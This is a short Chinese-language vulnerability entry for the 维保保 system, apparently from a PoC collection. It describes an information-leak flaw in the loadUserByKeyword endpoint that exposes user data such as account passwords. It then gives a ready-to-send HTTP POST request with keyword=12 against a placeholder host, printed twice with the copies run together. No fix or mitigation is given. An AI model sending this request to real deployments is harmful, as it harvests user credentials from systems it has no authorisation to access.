漏洞描述
维保保 loadUserByKeyword 接口存在信息泄露漏洞,攻击者可利用该漏洞获取系统用户信息,如账户密码等等。
维保保 loadUserByKeyword 信息泄露漏洞
PoC代码
POST /weixin/resource/loadUserByKeyword HTTP/1.1
Host: xxxxxx
Content-Type: application/x-www-form-urlencoded
keyword=12POST /weixin/resource/loadUserByKeyword HTTP/1.1
Host: xxxxxx
Content-Type: application/x-www-form-urlencoded
keyword=12